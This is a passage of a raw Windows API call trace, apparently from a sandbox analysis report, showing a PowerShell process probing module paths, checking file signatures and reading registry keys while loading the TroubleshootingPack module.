lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0dba0 | out: lpFileInformation=0x5a0dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd88a4ec5, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0xd88a4ec5, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x91837f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5198)) returned 1 [0154.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d8d8) returned 1 [0154.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0154.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0154.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0154.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0154.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d870) returned 1 [0154.686] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0db34 | out: lpFileInformation=0x5a0db34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd88a4ec5, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0xd88a4ec5, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x91837f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5198)) returned 1 [0154.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d86c) returned 1 [0154.686] CoTaskMemAlloc (cb=0x10) returned 0x5c0a150 [0154.686] CoTaskMemAlloc (cb=0x10) returned 0x5c0a168 [0154.686] CoTaskMemAlloc (cb=0xc0) returned 0x6377f0 [0154.686] CoTaskMemAlloc (cb=0x30) returned 0x6a8620 [0154.687] WinVerifyTrust () returned 0x0 [0155.517] CoTaskMemFree (pv=0x5c0a150) [0155.517] CoTaskMemFree (pv=0x6a8620) [0155.517] CryptCATHandleFromStore () returned 0x62502a0 [0155.517] WTHelperGetProvSignerFromChain () returned 0x6966d8 [0155.517] WTHelperGetProvCertFromChain () returned 0x625af98 [0155.532] CertDuplicateCRLContext (pCrlContext=0x5bf7d00) returned 0x5bf7d00 [0155.533] WTHelperGetProvCertFromChain () returned 0x6326050 [0155.534] CertDuplicateCRLContext (pCrlContext=0x5bf7d50) returned 0x5bf7d50 [0155.534] CoTaskMemAlloc (cb=0x10) returned 0x5c0a138 [0155.534] CoTaskMemAlloc (cb=0x30) returned 0x6a8620 [0155.534] WinVerifyTrust () returned 0x0 [0155.534] CoTaskMemFree (pv=0x6a8620) [0155.534] CoTaskMemFree (pv=0x5c0a138) [0155.535] CoTaskMemFree (pv=0x6377f0) [0155.535] CoTaskMemFree (pv=0x5c0a168) [0155.547] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\en-US\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\en-us\\troubleshootingpack.psd1")) returned 0xffffffff [0155.548] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\en\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\en\\troubleshootingpack.psd1")) returned 0xffffffff [0155.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0155.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0155.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x47 [0155.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x47, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", lpFilePart=0x0) returned 0x46 [0155.549] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0d52c | out: phkResult=0x5a0d52c*=0x570) returned 0x0 [0155.549] RegQueryValueExW (in: hKey=0x570, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0d54c, lpData=0x0, lpcbData=0x5a0d548*=0x0 | out: lpType=0x5a0d54c*=0x1, lpData=0x0, lpcbData=0x5a0d548*=0x56) returned 0x0 [0155.550] RegQueryValueExW (in: hKey=0x570, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0d54c, lpData=0x2732428, lpcbData=0x5a0d548*=0x56 | out: lpType=0x5a0d54c*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0d548*=0x56) returned 0x0 [0155.550] RegCloseKey (hKey=0x570) returned 0x0 [0155.554] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.format.ps1xml")) returned 0x20 [0155.560] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.format.ps1xml")) returned 0x20 [0155.561] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.format.ps1xml")) returned 0x20 [0155.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5b [0155.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\PSGetModuleInfo.xml", nBufferLength=0x5b, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x5a [0155.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d32c) returned 1 [0155.565] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x5a0d5f0 | out: lpFileInformation=0x5a0d5f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d328) returned 1 [0155.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x77 [0155.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack", nBufferLength=0x77, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack", lpFilePart=0x0) returned 0x76 [0155.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d22c) returned 1 [0155.566] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack"), fInfoLevelId=0x0, lpFileInformation=0x5a0d4f0 | out: lpFileInformation=0x5a0d4f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d228) returned 1 [0155.570] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.psd1")) returned 0xffffffff [0155.575] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.psm1")) returned 0xffffffff [0155.579] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.cdxml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.cdxml")) returned 0xffffffff [0155.583] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.xaml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.xaml")) returned 0xffffffff [0155.587] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.ni.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.ni.dll")) returned 0xffffffff [0155.591] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.dll")) returned 0xffffffff [0155.595] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.psd1")) returned 0xffffffff [0155.599] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.psm1")) returned 0xffffffff [0155.603] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.cdxml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.cdxml")) returned 0xffffffff [0155.607] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.xaml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.xaml")) returned 0xffffffff [0155.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d134) returned 1 [0155.615] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.windows.diagnosis.troubleshootingpack"), fInfoLevelId=0x0, lpFileInformation=0x5a0d3f8 | out: lpFileInformation=0x5a0d3f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d130) returned 1 [0155.616] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.psm1")) returned 0xffffffff [0155.628] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules" (normalized: "c:\\program files (x86)\\windowspowershell\\modules")) returned 0x10 [0155.629] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x61 [0155.629] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack", nBufferLength=0x61, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack", lpFilePart=0x0) returned 0x60 [0155.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d134) returned 1 [0155.629] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.windows.diagnosis.troubleshootingpack"), fInfoLevelId=0x0, lpFileInformation=0x5a0d3f8 | out: lpFileInformation=0x5a0d3f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d130) returned 1 [0155.633] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.psd1")) returned 0xffffffff [0155.637] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.psm1")) returned 0xffffffff [0155.641] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.cdxml")) returned 0xffffffff [0155.645] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.xaml")) returned 0xffffffff [0155.649] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.ni.dll")) returned 0xffffffff [0155.653] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.dll")) returned 0xffffffff [0155.657] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules")) returned 0x10 [0155.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x63 [0155.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack", nBufferLength=0x63, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack", lpFilePart=0x0) returned 0x62 [0155.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d134) returned 1 [0155.658] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.windows.diagnosis.troubleshootingpack"), fInfoLevelId=0x0, lpFileInformation=0x5a0d3f8 | out: lpFileInformation=0x5a0d3f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d130) returned 1 [0155.662] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.psd1")) returned 0xffffffff [0155.667] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.psm1")) returned 0xffffffff [0155.671] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.cdxml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.cdxml")) returned 0xffffffff [0155.677] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.xaml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.xaml")) returned 0xffffffff [0155.687] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.ni.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.ni.dll")) returned 0xffffffff [0155.692] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.windows.diagnosis.troubleshootingpack\\microsoft.windows.diagnosis.troubleshootingpack.dll")) returned 0xffffffff [0155.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack", nBufferLength=0x105, lpBuffer=0x5a0b440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack", lpFilePart=0x0) returned 0x76 [0155.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack", nBufferLength=0x105, lpBuffer=0x5a0b3c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\Microsoft.Windows.Diagnosis.TroubleshootingPack", lpFilePart=0x0) returned 0x76 [0155.994] CoGetContextToken (in: pToken=0x5a0abd4 | out: pToken=0x5a0abd4) returned 0x0 [0155.994] CoGetContextToken (in: pToken=0x5a0ab7c | out: pToken=0x5a0ab7c) returned 0x0 [0155.994] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x1, cHandles=0x1, pHandles=0x5a0ab64*=0x384, lpdwindex=0x5a0aa1c | out: lpdwindex=0x5a0aa1c) returned 0x80010115 [0155.994] CoGetContextToken (in: pToken=0x5a0a020 | out: pToken=0x5a0a020) returned 0x0 [0155.994] CoGetContextToken (in: pToken=0x5a0a004 | out: pToken=0x5a0a004) returned 0x0 [0155.994] CoGetContextToken (in: pToken=0x5a09f88 | out: pToken=0x5a09f88) returned 0x0 [0155.994] CoGetContextToken (in: pToken=0x5a09f88 | out: pToken=0x5a09f88) returned 0x0 [0155.995] CoGetContextToken (in: pToken=0x5a09f88 | out: pToken=0x5a09f88) returned 0x0 [0156.002] CoGetContextToken (in: pToken=0x5a0afe4 | out: pToken=0x5a0afe4) returned 0x0 [0156.003] CoGetContextToken (in: pToken=0x5a0b5b4 | out: pToken=0x5a0b5b4) returned 0x0 [0156.003] CoGetContextToken (in: pToken=0x5a0b514 | out: pToken=0x5a0b514) returned 0x0 [0156.003] CoGetContextToken (in: pToken=0x5a0b644 | out: pToken=0x5a0b644) returned 0x0 [0156.019] CoGetContextToken (in: pToken=0x5a0abcc | out: pToken=0x5a0abcc) returned 0x0 [0156.019] CoGetContextToken (in: pToken=0x5a0afdc | out: pToken=0x5a0afdc) returned 0x0 [0156.020] CoGetContextToken (in: pToken=0x5a0b5ac | out: pToken=0x5a0b5ac) returned 0x0 [0156.020] CoGetContextToken (in: pToken=0x5a0b50c | out: pToken=0x5a0b50c) returned 0x0 [0156.020] CoGetContextToken (in: pToken=0x5a0abc4 | out: pToken=0x5a0abc4) returned 0x0 [0156.020] CoGetContextToken (in: pToken=0x5a0afd4 | out: pToken=0x5a0afd4) returned 0x0 [0156.020] CoGetContextToken (in: pToken=0x5a0b5a4 | out: pToken=0x5a0b5a4) returned 0x0 [0156.020] CoGetContextToken (in: pToken=0x5a0b504 | out: pToken=0x5a0b504) returned 0x0 [0156.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\6.1.0.0__31bf3856ad364e35\\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll", nBufferLength=0x105, lpBuffer=0x5a0b3e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\6.1.0.0__31bf3856ad364e35\\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll", lpFilePart=0x0) returned 0x9a [0156.917] GetFullPathNameW (in: 